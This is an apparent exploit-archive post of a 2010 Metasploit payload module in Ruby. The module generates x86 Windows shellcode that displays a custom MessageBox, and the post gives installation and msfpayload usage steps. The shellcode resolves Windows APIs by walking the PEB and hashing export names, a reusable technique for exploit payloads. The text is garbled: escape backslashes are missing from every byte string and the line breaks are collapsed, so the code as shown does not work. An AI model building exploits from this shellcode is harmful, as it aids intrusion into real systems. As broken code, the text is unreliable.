win32 MessageBox (Metasploit module) shellcode
Posted on 25 March 2010
============================================== win32 MessageBox (Metasploit module) shellcode ============================================== ## # $Id: messagebox.rb 4 2010-02-26 00:28:00:00Z corelanc0d3r & rick2600 $ ## # # Installation instructions : # Drop file in framework3/modules/payloads/singles/windows folder # # Usage : ./msfpayload windows/messagebox TITLE="Corelan" TEXT="Greetz to corelanc0d3r" P # require 'msf/core' module Metasploit3 include Msf::Payload::Windows include Msf::Payload::Single def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Messagebox with custom title and text', 'Version' => '$Revision: 4 $', 'Description' => 'Spawns MessageBox with a customizable title & text', 'Author' => [ 'corelanc0d3r - peter.ve[at]corelan.be', 'rick2600 - ricks2600[at]gmail.com' ], 'License' => BSD_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => false, 'Payload' => { 'Offsets' => { }, 'Payload' => "xd9xebx9bxd9x74x24xf4x31"+ "xd2xb2x7ax31xc9x64x8bx71"+ "x30x8bx76x0cx8bx76x1cx8b"+ "x46x08x8bx7ex20x8bx36x38"+ "x4fx18x75xf3x59x01xd1xff"+ "xe1x60x8bx6cx24x24x8bx45"+ "x3cx8bx54x05x78x01xeax8b"+ "x4ax18x8bx5ax20x01xebxe3"+ "x37x49x8bx34x8bx01xeex31"+ "xffx31xc0xfcxacx84xc0x74"+ "x0axc1xcfx0dx01xc7xe9xf1"+ "xffxffxffx3bx7cx24x28x75"+ "xdex8bx5ax24x01xebx66x8b"+ "x0cx4bx8bx5ax1cx01xebx8b"+ "x04x8bx01xe8x89x44x24x1c"+ "x61xc3xb2x08x29xd4x89xe5"+ "x89xc2x68x8ex4ex0execx52"+ "xe8x9cxffxffxffx89x45x04"+ "xbb" } )) # EXITFUNC : Only support Process and Thread :/ deregister_options('EXITFUNC') # Register MessageBox options register_options( [ OptString.new('EXITFUNC', [ false, "Only Process (default) or Thread are supported","process"]), OptString.new('TITLE', [ true, "Messagebox Title (max 255 chars)" ]), OptString.new('TEXT', [ true, "Messagebox Text" ]) ], self.class) end # # Constructs the payload # def generate strExitFunc = datastore['EXITFUNC'] || "process" strExitFuncHash = "x7exd8xe2x73" #ExitProcess() strTitle = datastore['TITLE'] if (strTitle) #ExitFunc if (strExitFunc) then strExitFunc=strExitFunc.downcase if strExitFunc == "thread" then strExitFuncHash="xEFxCExE0x60" #ExitThread() end end #================Process Title================================== strTitle=strTitle+"X" iTitle=strTitle.length if (iTitle < 256) iNrLines=iTitle/4 iCheckChars = iNrLines * 4 strSpaces="" iSniperTitle=iTitle-1 if iCheckChars != iTitle then iTargetChars=(iNrLines+1)*4 while iTitle < iTargetChars strSpaces+=" " #add space iTitle+=1 end end strTitle=strTitle+strSpaces #title is now 4 byte aligned #and string ends with X #at index iSniperTitle #push Title to stack #start at back of string strPushTitle="" strLine="" icnt=strTitle.length-1 icharcnt=0 while icnt >= 0 thisChar=strTitle[icnt,1] strLine=thisChar+strLine if icharcnt < 3 icharcnt+=1 else strPushTitle=strPushTitle+"h"+strLine #h = 68 = push strLine="" icharcnt=0 end icnt=icnt-1 end #generate opcode to write null byte strWriteTitleNull="x31xDBx88x5Cx24" strWriteTitleNull += iSniperTitle.chr + "x89xe3" #================Process Text=============================== #cut text into 4 byte push instructions strText = datastore['TEXT'] strText=strText+"X" iText=strText.length iNrLines=iText/4 iCheckChars = iNrLines * 4 strSpaces="" iSniperText=iText-1 if iCheckChars != iText then iTargetChars=(iNrLines+1)*4 while iText < iTargetChars strSpaces+=" " #add space iText+=1 end end strText=strText+strSpaces #text is now 4 byte aligned #and string ends with X #at index iSniperTitle #push Text to stack #start at back of string strPushText="" strLine="" icnt=strText.length-1 icharcnt=0 while icnt >= 0 thisChar=strText[icnt,1] strLine=thisChar+strLine if icharcnt < 3 icharcnt+=1 else strPushText=strPushText+"h"+strLine #h = 68 = push strLine="" icharcnt=0 end icnt=icnt-1 end #generate opcode to write null byte strWriteTextNull="x31xc9x88x4Cx24" strWriteTextNull += iSniperText.chr + "x89xe1" #build payload payload_data = module_info['Payload']['Payload'] payload_data += strExitFuncHash payload_data += "x87x1cx24" payload_data += "x52xe8x8bxffxffxffx89x45" payload_data += "x08x68x6cx6cx20xffx68x33" payload_data += "x32x2ex64x68x75x73x65x72" payload_data += "x88x5cx24x0ax89xe6x56xff" payload_data += "x55x04x89xc2x50xbbxa8xa2" payload_data += "x4dxbcx87x1cx24x52xe8x5e" payload_data += "xffxffxff" payload_data += strPushTitle + strWriteTitleNull payload_data += strPushText + strWriteTextNull payload_data += "x31xd2x52" payload_data += "x53x51x52xffxd0x31xc0x50" payload_data += "xffx55x08" return payload_data else raise ArgumentError, "Title should be 255 characters or less" end end end end # Inj3ct0r.com [2010-03-25]
